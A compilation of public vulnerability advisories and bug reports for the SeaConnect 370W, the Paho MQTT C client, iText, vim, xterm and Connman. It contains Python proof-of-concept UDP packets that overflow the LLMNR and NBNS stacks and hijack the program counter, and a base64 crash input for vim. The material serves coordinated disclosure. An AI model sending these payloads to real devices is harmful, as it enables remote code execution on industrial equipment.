An out-of-bounds write vulnerability exists in the URL_decode functionality of Sealevel Systems, Inc. SeaConnect 370W v1.3.34. A specially-crafted MQTT payload can lead to an out-of-bounds write. An attacker can perform a man-in-the-middle attack to trigger this vulnerability.

**Summary**

An out-of-bounds write vulnerability exists in the readPacket functionality of Eclipse Foundation Embedded Paho MQTTClient-C library v1.0.0. A specially-crafted MQTT payload can lead to an out-of-bounds write. An attacker can send a malicious MQTT message to trigger this vulnerability.

**Tested Versions**

Eclipse Foundation Embedded Paho MQTTClient-C library v1.0.0  
Sealevel Systems, Inc. SeaConnect 370W v1.3.34

**Product URLs**

Embedded Paho MQTTClient-C library - https://www.eclipse.org/paho/index.php?page=clients/c/embedded/index.php SeaConnect 370W - https://www.sealevel.com/product/370w-a-wifi-to-form-c-relays-digital-inputs-a-d-inputs-and-1-wire-bus-seaconnect-multifunction-io-edge-module-powered-by-seacloud/

**CVSSv3 Score**

9.8 - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

**CWE**

CWE-120 - Buffer Copy without Checking Size of Input (‘Classic Buffer Overflow’)

**Details**

The Embedded Paho MQTTClient-C library is a MQTT client library for the language C. This library is primarily designed for embedded devices.

This vulnerability was discovered while looking at the SeaConnect 370W. The mentioned device uses the Paho MQTTClient-C library version 1.0.0. In this version is present a buffer overflow vulnerability in the function readPacket. This was corrected in July 2017. This correction was treated as a security improvement, and no CVE was assigned to it. The consequence was that the SeaConnect 370W did not update its firmware with the correction. This, in turn, leads to a remote command execution vulnerability in the SeaConnect 370W due to the buffer overflow caused in the Paho MQTTClient-C library version 1.0.0.

The readPacket function in the SeaConnect 370W is:

      uint readPacket(MQTTClient *c,undefined4 param_2)
    
      {
        uint rc;
        undefined4 timer_;
        int iVar1;
        dword dVar2;
        undefined *ipstack;
        dword rem_len;
    
        read_volatile(PTR_DWORD_20012de8._0_1_);
        ipstack = c->ipstack;
        rem_len = 0;
        timer_ = TimerLeftMS(param_2);
        rc = (**(code **)(ipstack + 0x30))(ipstack,c->readbuf,1,timer_);                                    [1]
                          /* calling mqttread ^ */
        if (rc == 1) {
          timer_ = TimerLeftMS(param_2);
          decodePacket(c,&rem_len,timer_);                                                                  [2]
          iVar1 = MQTTPacket_encode(c->readbuf + 1,rem_len);
          if (0 < (int)rem_len) {
            ipstack = c->ipstack;
            timer_ = TimerLeftMS(param_2);
            dVar2 = (**(code **)(ipstack + 0x30))(ipstack,c->readbuf + iVar1 + 1,rem_len,timer_);           [3]
                          /* calling mqttread ^ */
            if (rem_len != dVar2) {
              return 1;
            }
          }
          rc = ((uint)(byte)*c->readbuf << 0x18) >> 0x1c;
        }
        return rc;
      }
    

This is a Paho MQTTClient-C’s function that handles a new MQTT mesage. It reads at [1] the heder byte and at [2] reads, from the packet, the remaining size of the packet. This size is then used at [3] to read into a heap buffer the remaining message.

The buffer used at [3], for the SeaConnect 370W, is allocated in SeaConnectMqtt_Init:

      void SeaConnectMqtt_Init(void)
    
      {
        [...]
        
        receiveBuffer_ptr = (int *)read_volatile_4(receiveBuffer);
        puVar1 = read_volatile_4(PTR_aSeaconnectmqtt_3_20010be8);
        if (*receiveBuffer_ptr == 0) {
          malloc_res = malloc(0x201);                                                                       [4]
          *receiveBuffer_ptr = malloc_res;
        [...]
        
        }
    

At [4] 0x201 bytes are allocated to manage a MQTT mesage, but the function readPacket does not control the size of the variable rem_len before reading the message content at [3]. This can lead to a buffer overflow.

The corrected Paho MQTTClient-C’s readPacket:

    static int readPacket(MQTTClient* c, Timer* timer)
    {
        MQTTHeader header = {0};
        int len = 0;
        int rem_len = 0;
    
        /* 1. read the header byte.  This has the packet type in it */
        int rc = c->ipstack->mqttread(c->ipstack, c->readbuf, 1, TimerLeftMS(timer));
        if (rc != 1)
            goto exit;
    
        len = 1;
        /* 2. read the remaining length.  This is variable in itself */
        decodePacket(c, &rem_len, TimerLeftMS(timer));
        len += MQTTPacket_encode(c->readbuf + 1, rem_len); /* put the original remaining length back into the buffer */
    
        if (rem_len > (c->readbuf_size - len))                                                              [5]
        {
            rc = BUFFER_OVERFLOW;
            goto exit;
        }
    
        /* 3. read the rest of the buffer using a callback to supply the rest of the data */
        if (rem_len > 0 && (rc = c->ipstack->mqttread(c->ipstack, c->readbuf + len, rem_len, TimerLeftMS(timer)) != rem_len)) {
            rc = 0;
            goto exit;
        }
    
        header.byte = c->readbuf[0];
        rc = header.bits.type;
    exit:
        return rc;
    }
    

A size check was introduced at [5] to avoid the buffer overflow.

The nature of the buffer overflow depends upon the library user. Indeed, the buffer used in readPacket is provided by the library utilizer and not allocated by the Paho MQTTClient-C library.

**Timeline**

2021-10-27 - Initial vendor contact  
2021-11-03 - Vendor disclosure  
2022-02-01 - Public Release  

Discovered by Francesco Benvenuto and Matt Wiseman of Cisco Talos.

CVE-2021-21971: TALOS-2021-1406 || Cisco Talos Intelligence Group

A stack-based buffer overflow vulnerability exists in both the LLMNR functionality of Sealevel Systems, Inc. SeaConnect 370W v1.3.34. A specially-crafted network packet can lead to remote code execution. An attacker can send a malicious packet to trigger this vulnerability.

**Summary**

A stack-based buffer overflow vulnerability exists in both the LLMNR and NBNS functionality of Sealevel Systems, Inc. SeaConnect 370W v1.3.34. A specially-crafted network packet can lead to remote code execution. An attacker can send a malicious packet to trigger either of the vulnerabilities.

**Tested Versions**

Sealevel Systems, Inc. SeaConnect 370W v1.3.34

**Product URLs**

SeaConnect 370W - https://www.sealevel.com/product/370w-a-wifi-to-form-c-relays-digital-inputs-a-d-inputs-and-1-wire-bus-seaconnect-multifunction-io-edge-module-powered-by-seacloud/

**CVSSv3 Score**

10.0 - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

**CWE**

CWE-121 - Stack-based Buffer Overflow

**Details**

The SeaConnect 370W is a Wi-Fi connected IIoT device offering programmable cloud access and control of digital and analog I/O and a 1-wire bus.

This device offers remote control via several means including MQTT, Modbus TCP and a manufacturer-specific protocol named “SeaMAX API.”

The device is built on top of the TI CC3200 MCU with built-in Wi-Fi capabilities.

The SeaConnect 370W exposes three name resolution services: LLMNR, NBNS and mDNS. The LLMNR and NBNS implementations both contain similar stack-based buffer overflows while parsing received queries. Given that LLMNR and NBNS both utilize the DNS header format with only a handful of exceptions, their parsing code is very similar. In this case, it appears to be reused from one to the next.

The vulnerability occurs when attempting to copy the queried name to a local buffer of fixed size (identified above as name_buffer). The implementation does not conduct any bounds checking prior to copying the data, simply trusting the supplied length field will be accurate and no larger than 32 bytes. Supplying a significantly large length value and queried name will result in an overflow of the stack, and ultimately in attacker control of the program counter. The overflow is limited to a maximum of 255 bytes in controllable data, as the length field is limited to a single byte.

**CVE-2021-21960 - LLMNR Buffer Overflow**

The parsing implementation for LLMNR begins at raw offset 0x1106A, which when mapped in to RAM for execution, is located at 0x2001106A.

    int __fastcall GenerateLLMNRResponse(_WORD *a1, _DWORD *a2, __int16 *query)
    {
      __int16 *offset; // r7
      __int16 id; // r10
      __int16 flags; // t1
      __int16 QDCOUNT; // t1
      __int16 ANCOUNT; // t1
      __int16 NSCOUNT; // t1
      __int16 ARCOUNT; // t1
      char *queried_name; // r7
      int name_length; // t1 MAPDST
      char *name_buffer_idx; // r1
      char curr_char; // t1
      ...
      char name_buffer[32]; // [sp+0h] [bp-68h] BYREF      [1] Fixed size, stack-allocated buffer of 32 bytes
      char response[72]; // [sp+20h] [bp-48h] BYREF
    
      offset = query + 1;
      id = htons(*query);
      flags = *offset++;
      htons(flags);
      QDCOUNT = *offset++;
      htons(QDCOUNT);
      ANCOUNT = *offset++;
      htons(ANCOUNT);
      NSCOUNT = *offset++;
      htons(NSCOUNT);
      ARCOUNT = *offset++;
      htons(ARCOUNT);
      
      name_length = *offset;                               [2] Read length octet of the queried name from attacker controlled payload
      queried_name = offset + 1;
      memset(name_buffer, 0, sizeof(name_buffer));
      for (int idx = 0; idx < name_length; idx++)          [3] Copy `name_length` bytes into stack-based variable, with no checks
      {
          name_buffer[idx] = queried_name[idx];
      }
      ...
    }
    

The copy that occurs at [3] results in a straightforward buffer overflow that will corrupt the link register value pushed on to the stack when the function was first entered. When this corrupted value is popped from the stack, the program counter will begin executing from an arbitrary attacker-controlled address.

**Crash Information**

    [Hard fault handler]
    R0       = 0x00000000
    R1       = 0x200014e8
    R2       = 0x20001508
    R3       = 0x00000032
    R12      = 0x20001560
    LR [R14] = 0x20011115  subroutine call return address
    PC [R15] = 0x4d4d4d4c  Program Counter
    PSR      = 0x21000000
    BFAR     = 0xe000ed38
    CFSR     = 0x00000001
    HFSR     = 0x40000000
    DFSR     = 0x00000000
    AFSR     = 0x00000000
    

**Exploit Proof of Concept**

    import socket
    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    s.sendto(b'\xdf\x76\x01\x20\x00\x01\x00\x00\x00\x00\x00\x00\xff' + b'A'*100 + b'MMMM', ('<target_ip>', 5355))
    

**CVE-2021-21961 - NBNS Buffer Overflow**

The parsing implementation for NetBIOS begins at raw offset 0x10D70, which when mapped in to RAM for execution, is located at 0x20010D70. Note that the parsing implementation is the same.

    int __fastcall GenerateNBNSResponse(_WORD *a1, _DWORD *a2, __int16 *query)
    {
      __int16 *offset; // r7
      __int16 id; // r10
      __int16 flags; // t1
      __int16 QDCOUNT; // t1
      __int16 ANCOUNT; // t1
      __int16 NSCOUNT; // t1
      __int16 ARCOUNT; // t1
      char *queried_name; // r7
      int name_length; // t1 MAPDST
      char *name_buffer_idx; // r1
      char curr_char; // t1
      ...
      char name_buffer[32]; // [sp+0h] [bp-68h] BYREF      [1] Fixed size, stack-allocated buffer of 32 bytes
      char response[72]; // [sp+20h] [bp-48h] BYREF
    
      offset = query + 1;
      id = htons(*query);
      flags = *offset++;
      htons(flags);
      QDCOUNT = *offset++;
      htons(QDCOUNT);
      ANCOUNT = *offset++;
      htons(ANCOUNT);
      NSCOUNT = *offset++;
      htons(NSCOUNT);
      ARCOUNT = *offset++;
      htons(ARCOUNT);
      
      name_length = *offset;                               [2] Read length octet of the queried name
      queried_name = offset + 1;
      memset(name_buffer, 0, sizeof(name_buffer));
      for (int idx = 0; idx < name_length; idx++)          [3] Copy `name_length` bytes into stack-based variable, with no checks
      {
          name_buffer[idx] = queried_name[idx];
      }
      ...
    }
    

The copy that occurs at [3] results in a straightforward buffer overflow that will corrupt the link register value pushed on to the stack when the function was first entered. When this corrupted value is popped from the stack, the program counter will begin executing from an arbitrary attacker-controlled address.

**Crash Information**

    [Hard fault handler]
    R0       = 0x00000000
    R1       = 0x200014e8
    R2       = 0x00000020
    R3       = 0x00000041
    R12      = 0x20001560
    LR [R14] = 0x20010e09  subroutine call return address
    PC [R15] = 0x4d4d4d4c  Program Counter
    PSR      = 0x21000000
    BFAR     = 0xe000ed38
    CFSR     = 0x00000001
    HFSR     = 0x40000000
    DFSR     = 0x00000000
    AFSR     = 0x00000000
    

**Exploit Proof of Concept**

    import socket
    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    s.sendto(b'\xdf\x76\x01\x20\x00\x01\x00\x00\x00\x00\x00\x00\xff' + b'A'*100 + b'MMMM', ('<target_ip>', 137))
    

**Timeline**

2021-10-26 - Vendor disclosure  
2022-02-01 - Public Release  

Discovered by Francesco Benvenuto and Matt Wiseman of Cisco Talos.

CVE-2021-21960: TALOS-2021-1389 || Cisco Talos Intelligence Group

iText v7.1.17 was discovered to contain a stack-based buffer overflow via the component ByteBuffer.append, which allows attackers to cause a Denial of Service (DoS) via a crafted PDF file.

**Unqiue Bugs Found**

Recently we (\[Zhang Cen\](https://github.com/occia) , \[Huang Wenjie\](https://github.com/ZanderHuang) and \[Zhang Xiaohan\](https://github.com/Han0nly)) discovered a series of bugs in latest itextpdf (version 7.1.17). Every bug we reported in the following is unique and reproducable. Furthermore, they have been manually analyzed and triaged in removing the duplicates.  
Due to the lack of contextual knowledge in the itextpdf library, we cannot thoroughly fix some bugs hence we look forward to any proposed plan from the developers in fixing these bugs.

**Bug Report**

The bug report folder can be downloaded from https://drive.google.com/drive/folders/1b38Mi8fKp05vzMbth1oiopFYNH92GWrK?usp=sharing

Total 56 bugs are reported in this pull request.  
A full list is provided below.

**Folder structure**

*   Level 1 (folder): exception type
*   Level 2 (folder): error location
*   Level 3 (files): POC file and **report.txt** including reproducing steps

**report.txt content:**

1.  Exception type
2.  Error location
3.  Bug cause and impact
4.  Crash thread's stacks
5.  Steps to reproduce

**Bug full list**

1.  java.lang.ArrayIndexOutOfBoundsException  
    \-- com.itextpdf.kernel.crypto.ARCFOUREncryption.encryptARCFOUR--ARCFOUREncryption.java-93  
    \-- com.itextpdf.kernel.crypto.securityhandler.StandardHandlerUsingStandard128.computeOwnerKey--StandardHandlerUsingStandard128.java-81  
    \-- com.itextpdf.kernel.pdf.PdfXrefTable.clear--PdfXrefTable.java-448  
    \-- com.itextpdf.kernel.pdf.PdfXrefTable.get--PdfXrefTable.java-153  
    \-- com.itextpdf.kernel.pdf.PdfXrefTable.initFreeReferencesList--PdfXrefTable.java-185
2.  java.lang.ClassCastException  
    \-- com.itextpdf.kernel.crypto.securityhandler.StandardHandlerUsingStandard40.initKeyAndReadDictionary--StandardHandlerUsingStandard40.java-193  
    \-- com.itextpdf.kernel.pdf.PdfDocument.open--PdfDocument.java-1958  
    \-- com.itextpdf.kernel.pdf.PdfEncryption.readAndSetCryptoModeForStdHandler--PdfEncryption.java-531  
    \-- com.itextpdf.kernel.pdf.PdfEncryption.readAndSetCryptoModeForStdHandler--PdfEncryption.java-534  
    \-- com.itextpdf.kernel.pdf.PdfReader.readObject--PdfReader.java-1344
3.  java.lang.NegativeArraySizeException  
    \-- com.itextpdf.kernel.pdf.PdfXrefTable.extendXref--PdfXrefTable.java-598
4.  java.lang.NullPointerException  
    \-- com.itextpdf.kernel.crypto.securityhandler.StandardHandlerUsingStandard40.initKeyAndReadDictionary--StandardHandlerUsingStandard40.java-194  
    \-- com.itextpdf.kernel.crypto.securityhandler.StandardSecurityHandler.getIsoBytes--StandardSecurityHandler.java-94  
    \-- com.itextpdf.kernel.pdf.PdfArray.get--PdfArray.java-374  
    \-- com.itextpdf.kernel.pdf.PdfObjectWrapper.markObjectAsIndirect--PdfObjectWrapper.java-141  
    \-- com.itextpdf.kernel.pdf.PdfReader.getOriginalFileId--PdfReader.java-669  
    \-- com.itextpdf.kernel.pdf.PdfReader.readDecryptObj--PdfReader.java-1287  
    \-- com.itextpdf.kernel.pdf.PdfReader.readObject--PdfReader.java-1344  
    \-- com.itextpdf.kernel.pdf.PdfReader.readObjectStream--PdfReader.java-738  
    \-- com.itextpdf.kernel.pdf.PdfReader.readObjectStream--PdfReader.java-739  
    \-- com.itextpdf.kernel.pdf.PdfReader.readObjectStream--PdfReader.java-740  
    \-- com.itextpdf.kernel.pdf.PdfReader.readObjectStream--PdfReader.java-773  
    \-- com.itextpdf.kernel.pdf.PdfReader.readObjectStream--PdfReader.java-792
5.  java.lang.NumberFormatException  
    \-- com.itextpdf.io.source.PdfTokenizer.getIntValue--PdfTokenizer.java-512  
    \-- com.itextpdf.io.source.PdfTokenizer.nextValidToken--PdfTokenizer.java-314  
    \-- com.itextpdf.io.source.PdfTokenizer.nextValidToken--PdfTokenizer.java-315
6.  java.lang.OutOfMemoryError  
    \-- com.itextpdf.kernel.pdf.PdfReader.readStreamBytesRaw--PdfReader.java-391  
    \-- com.itextpdf.kernel.pdf.PdfXrefTable.extendXref--PdfXrefTable.java-598
7.  java.lang.StackOverflowError  
    \-- com.itextpdf.io.source.ByteBuffer.append--ByteBuffer.java-110  
    \-- com.itextpdf.io.source.PdfTokenizer.getStringValue--PdfTokenizer.java-187  
    \-- com.itextpdf.io.source.PdfTokenizer.nextToken--PdfTokenizer.java-341  
    \-- com.itextpdf.io.source.PdfTokenizer.nextToken--PdfTokenizer.java-343  
    \-- com.itextpdf.io.source.PdfTokenizer.nextToken--PdfTokenizer.java-361  
    \-- com.itextpdf.io.source.PdfTokenizer.nextToken--PdfTokenizer.java-377  
    \-- com.itextpdf.io.source.PdfTokenizer.nextToken--PdfTokenizer.java-413  
    \-- com.itextpdf.io.source.PdfTokenizer.nextToken--PdfTokenizer.java-452  
    \-- com.itextpdf.io.source.PdfTokenizer.nextToken--PdfTokenizer.java-469  
    \-- com.itextpdf.io.source.PdfTokenizer.nextValidToken--PdfTokenizer.java-271  
    \-- com.itextpdf.io.source.PdfTokenizer.nextValidToken--PdfTokenizer.java-300  
    \-- com.itextpdf.io.source.PdfTokenizer.nextValidToken--PdfTokenizer.java-306  
    \-- com.itextpdf.io.source.PdfTokenizer.nextValidToken--PdfTokenizer.java-314  
    \-- com.itextpdf.io.source.RandomAccessFileOrArray.read--RandomAccessFileOrArray.java-138  
    \-- com.itextpdf.io.util.MessageFormatUtil.format--MessageFormatUtil.java-55  
    \-- com.itextpdf.kernel.pdf.PdfDictionary.putAll--PdfDictionary.java-333  
    \-- com.itextpdf.kernel.pdf.PdfName.compareTo--PdfName.java-1003  
    \-- com.itextpdf.kernel.pdf.PdfNumber.generateValue--PdfNumber.java-180  
    \-- com.itextpdf.kernel.pdf.PdfReader.readArray--PdfReader.java-944  
    \-- com.itextpdf.kernel.pdf.PdfReader.readDictionary--PdfReader.java-923  
    \-- com.itextpdf.kernel.pdf.PdfReader.readObject--PdfReader.java-1336  
    \-- com.itextpdf.kernel.pdf.PdfReader.readObject--PdfReader.java-1344  
    \-- com.itextpdf.kernel.pdf.PdfReader.readObject--PdfReader.java-801  
    \-- com.itextpdf.kernel.pdf.PdfReader.readObject--PdfReader.java-845  
    \-- com.itextpdf.kernel.pdf.PdfReader.readPdfName--PdfReader.java-912  
    \-- com.itextpdf.kernel.pdf.PdfReader.readReference--PdfReader.java-817  
    \-- com.itextpdf.kernel.pdf.PdfReader.readReference--PdfReader.java-834
8.  java.lang.StringIndexOutOfBoundsException  
    \-- com.itextpdf.io.source.PdfTokenizer.checkPdfHeader--PdfTokenizer.java-239

Any further discussion for these vulnerabilities including fix is welcomed and look forward to hearing from you.

CVE-2022-24197: A list of bugs found by ZanderHuang · Pull Request #78 · itext/itext7

Heap-based Buffer Overflow GitHub repository vim/vim prior to 8.2.

CVE-2022-0417: Heap-based Buffer Overflow in vim

xterm through Patch 370, when Sixel support is enabled, allows attackers to trigger a buffer overflow in set_sixel in graphics_sixel.c via crafted text.

CVE-2022-24130: XTERM - Change Log

Stack-based Buffer Overflow in GitHub repository vim/vim prior to 8.2.

**Description**

Stack overflow occurs in spellsuggest.c.

commit : 44db8213d38c39877d2148eff6a72f4beccfb94e

**Proof of Concept**

    $ echo -ne "bm9ybRZzMDAwRzAw/TAwMDAwMDAwMDAwMApzaWwwbm9ybS4udnpHLi4uLi4uLi4uLi4uLi4uLnZ2
    ekcwICAgICB2IHo9" | base64 -d > minimized_poc
    
    # Valgrind
    $ ./vg-in-place -s ../vim-valgrind/src/vim -u NONE -i NONE -n -X -Z -e -m -s -S minimized_poc -c ":qa!"
    ==596658== Memcheck, a memory error detector
    ==596658== Copyright (C) 2002-2017, and GNU GPL'd, by Julian Seward et al.
    ==596658== Using Valgrind-3.19.0.GIT and LibVEX; rerun with -h for copyright info
    ==596658== Command: ../vim-valgrind/src/vim -u NONE -i NONE -n -X -Z -e -m -s -S minimized_poc -c :qa!
    ==596658==
    ==596658== Invalid read of size 4
    ==596658==    at 0x32FCBD: add_suggestion (spellsuggest.c:3530)
    ==596658==    by 0x32A8D1: suggest_trie_walk (spellsuggest.c:1639)
    ==596658==    by 0x1FFFFFFFF: ???
    ==596658==    by 0x10000000000FF00: ???
    ==596658==  Address 0x6000000008 is not stack'd, malloc'd or (recently) free'd
    ==596658==
    ==596658==
    ==596658== Process terminating with default action of signal 11 (SIGSEGV): dumping core
    ==596658==    at 0x4A2255B: kill (syscall-template.S:78)
    ==596658==    by 0x28FE98: may_core_dump (os_unix.c:3510)
    ==596658==    by 0x28FE4C: mch_exit (os_unix.c:3476)
    ==596658==    by 0x40A260: getout (main.c:1721)
    ==596658==    by 0x25302D: preserve_exit (misc1.c:2194)
    ==596658==    by 0x28E408: deathtrap (os_unix.c:1156)
    ==596658==    by 0x4A2220F: ??? (in /usr/lib/x86_64-linux-gnu/libc-2.31.so)
    ==596658==    by 0x32FCBC: add_suggestion (spellsuggest.c:3530)
    ==596658==    by 0x32A8D1: suggest_trie_walk (spellsuggest.c:1639)
    ==596658==    by 0x1FFFFFFFF: ???
    ==596658==    by 0x10000000000FF00: ???
    ==596658==
    ==596658== HEAP SUMMARY:
    ==596658==     in use at exit: 114,315 bytes in 593 blocks
    ==596658==   total heap usage: 1,864 allocs, 1,271 frees, 1,057,411 bytes allocated
    ==596658==
    ==596658== LEAK SUMMARY:
    ==596658==    definitely lost: 1,679 bytes in 6 blocks
    ==596658==    indirectly lost: 8 bytes in 3 blocks
    ==596658==      possibly lost: 268 bytes in 1 blocks
    ==596658==    still reachable: 112,360 bytes in 583 blocks
    ==596658==         suppressed: 0 bytes in 0 blocks
    ==596658== Rerun with --leak-check=full to see details of leaked memory
    ==596658==
    ==596658== ERROR SUMMARY: 1 errors from 1 contexts (suppressed: 0 from 0)
    ==596658==
    ==596658== 1 errors in context 1 of 1:
    ==596658== Invalid read of size 4
    ==596658==    at 0x32FCBD: add_suggestion (spellsuggest.c:3530)
    ==596658==    by 0x32A8D1: suggest_trie_walk (spellsuggest.c:1639)
    ==596658==    by 0x1FFFFFFFF: ???
    ==596658==    by 0x10000000000FF00: ???
    ==596658==  Address 0x6000000008 is not stack'd, malloc'd or (recently) free'd
    ==596658==
    ==596658== ERROR SUMMARY: 1 errors from 1 contexts (suppressed: 0 from 0)
    Segmentation fault
    
    # ASAN
    $ ~/fuzzing/vim-asan/src/vim -u NONE -i NONE -n -X -Z -e -m -s -S ~/fuzzing/valgrind/minimized_poc ":qa!"
    =================================================================
    ==250851==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7fffffff6b20 at pc 0x000000496710 bp 0x7fffffff3d10 sp 0x7fffffff34d8
    WRITE of size 32 at 0x7fffffff6b20 thread T0
        #0 0x49670f in __asan_memcpy (/home/alkyne/fuzzing/vim-asan/src/vim+0x49670f)
        #1 0xb08866 in go_deeper /home/alkyne/fuzzing/vim-asan/src/spellsuggest.c:2664:24
        #2 0xb08866 in suggest_trie_walk /home/alkyne/fuzzing/vim-asan/src/spellsuggest.c:1766:4
        #3 0xafa3e1 in suggest_try_change /home/alkyne/fuzzing/vim-asan/src/spellsuggest.c:1199:2
        #4 0xafa3e1 in spell_suggest_intern /home/alkyne/fuzzing/vim-asan/src/spellsuggest.c:995:5
        #5 0xafa3e1 in spell_find_suggest /home/alkyne/fuzzing/vim-asan/src/spellsuggest.c:870:6
        #6 0xaf6ffd in spell_suggest /home/alkyne/fuzzing/vim-asan/src/spellsuggest.c:545:5
        #7 0x894d7b in nv_zet /home/alkyne/fuzzing/vim-asan/src/normal.c:3398:7
        #8 0x864da8 in normal_cmd /home/alkyne/fuzzing/vim-asan/src/normal.c:1238:5
        #9 0x6a1a76 in exec_normal /home/alkyne/fuzzing/vim-asan/src/ex_docmd.c
        #10 0x6a0bb1 in exec_normal_cmd /home/alkyne/fuzzing/vim-asan/src/ex_docmd.c:8592:5
        #11 0x6a0bb1 in ex_normal /home/alkyne/fuzzing/vim-asan/src/ex_docmd.c:8510:6
        #12 0x67e82c in do_one_cmd /home/alkyne/fuzzing/vim-asan/src/ex_docmd.c:2567:2
        #13 0x67e82c in do_cmdline /home/alkyne/fuzzing/vim-asan/src/ex_docmd.c:993:17
        #14 0xa71d9d in do_source /home/alkyne/fuzzing/vim-asan/src/scriptfile.c:1512:5
        #15 0xa7042d in cmd_source /home/alkyne/fuzzing/vim-asan/src/scriptfile.c:1098:14
        #16 0xa7042d in ex_source /home/alkyne/fuzzing/vim-asan/src/scriptfile.c:1124:2
        #17 0x67e82c in do_one_cmd /home/alkyne/fuzzing/vim-asan/src/ex_docmd.c:2567:2
        #18 0x67e82c in do_cmdline /home/alkyne/fuzzing/vim-asan/src/ex_docmd.c:993:17
        #19 0xd97b27 in exe_commands /home/alkyne/fuzzing/vim-asan/src/main.c:3091:2
        #20 0xd97b27 in vim_main2 /home/alkyne/fuzzing/vim-asan/src/main.c:774:2
        #21 0xd95139 in main /home/alkyne/fuzzing/vim-asan/src/main.c:426:12
        #22 0x7ffff7c260b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16
        #23 0x41eacd in _start (/home/alkyne/fuzzing/vim-asan/src/vim+0x41eacd)
    
    Address 0x7fffffff6b20 is located in stack of thread T0 at offset 11776 in frame
        #0 0xb01cbf in suggest_trie_walk /home/alkyne/fuzzing/vim-asan/src/spellsuggest.c:1247
    
      This frame has 11 object(s):
        [32, 152) 'stack.i.i.i' (line 4307)
        [192, 200) 'p.i.i.i' (line 4316)
        [224, 1240) 'wbadword.i.i.i' (line 4317)
        [1376, 2392) 'wgoodword.i.i.i' (line 4318)
        [2528, 2648) 'stack.i.i' (line 4132)
        [2688, 2942) 'theword.i' (line 3169)
        [3008, 3262) 'cword.i' (line 3267)
        [3328, 3582) 'tword' (line 1248)
        [3648, 11776) 'stack' (line 1249) <== Memory access at offset 11776 overflows this variable
        [12032, 12794) 'preword' (line 1250)
        [12928, 13182) 'compflags' (line 1255)
    HINT: this may be a false positive if your program uses some custom stack unwind mechanism, swapcontext or vfork
          (longjmp and C++ exceptions *are* supported)
    SUMMARY: AddressSanitizer: stack-buffer-overflow (/home/alkyne/fuzzing/vim-asan/src/vim+0x49670f) in __asan_memcpy
    Shadow bytes around the buggy address:
      0x10007fff6d10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x10007fff6d20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x10007fff6d30: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x10007fff6d40: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x10007fff6d50: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    =>0x10007fff6d60: 00 00 00 00[f2]f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2
      0x10007fff6d70: f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2
      0x10007fff6d80: f2 f2 f2 f2 00 00 00 00 00 00 00 00 00 00 00 00
      0x10007fff6d90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x10007fff6da0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x10007fff6db0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    Shadow byte legend (one shadow byte represents 8 application bytes):
      Addressable:           00
      Partially addressable: 01 02 03 04 05 06 07
      Heap left redzone:       fa
      Freed heap region:       fd
      Stack left redzone:      f1
      Stack mid redzone:       f2
      Stack right redzone:     f3
      Stack after return:      f5
      Stack use after scope:   f8
      Global redzone:          f9
      Global init order:       f6
      Poisoned by user:        f7
      Container overflow:      fc
      Array cookie:            ac
      Intra object redzone:    bb
      ASan internal:           fe
      Left alloca redzone:     ca
      Right alloca redzone:    cb
      Shadow gap:              cc
    ==250851==ABORTING
    

**Impact**

Stack bof may lead to exploit the program.

CVE-2022-0408: Stack-based Buffer Overflow in vim

Heap-based Buffer Overflow in GitHub repository vim prior to 8.2.

Permalink

Browse files

patch 8.2.4218: illegal memory access with bracketed paste in Ex mode

Problem:    Illegal memory access with bracketed paste in Ex mode.
Solution:   Reserve space for the trailing NUL.

*   Loading branch information

1 parent 8d02ce1 commit 806d037671e133bd28a7864248763f643967973a

Showing **3 changed files** with **7 additions** and **1 deletion**.

*   *   edit.c
    *   *   test\_paste.vim
    *   version.c

@@ -4452,7 +4452,8 @@ bracketed\_paste(paste\_mode\_T mode, int drop, garray\_T \*gap)

break;

  

case PASTE\_EX:

if (gap != NULL && ga\_grow(gap, idx) == OK)

// add one for the NUL that is going to be appended

if (gap != NULL && ga\_grow(gap, idx + 1) == OK)

{

mch\_memmove((char \*)gap->ga\_data + gap->ga\_len,

buf, (size\_t)idx);

@@ -90,6 +90,9 @@ func Test\_paste\_ex\_mode()

unlet! foo

call feedkeys("Qlet foo=\\"\\<Esc>\[200~foo\\<CR>bar\\<Esc>\[201~\\"\\<CR>vi\\<CR>", 'xt')

call assert\_equal("foo\\rbar", foo)

  

" pasting more than 40 bytes

exe "norm Q\\<PasteStart>0000000000000000000000000000000000000000000000000000000000000000000000\\<C-C>"

endfunc

  

func Test\_paste\_onechar()

@@ -750,6 +750,8 @@ static char \*(features\[\]) =

  

static int included\_patches\[\] =

{ /\* Add new patch number below this line \*/

/\*\*/

4218,

/\*\*/

4217,

/\*\*/

**0 comments on commit 806d037**

Please sign in to comment.

CVE-2022-0392: patch 8.2.4218: illegal memory access with bracketed paste in Ex mode · vim/vim@806d037

An issue was discovered in the DNS proxy in Connman through 1.40. The TCP server reply implementation has an infinite loop if no data is received.

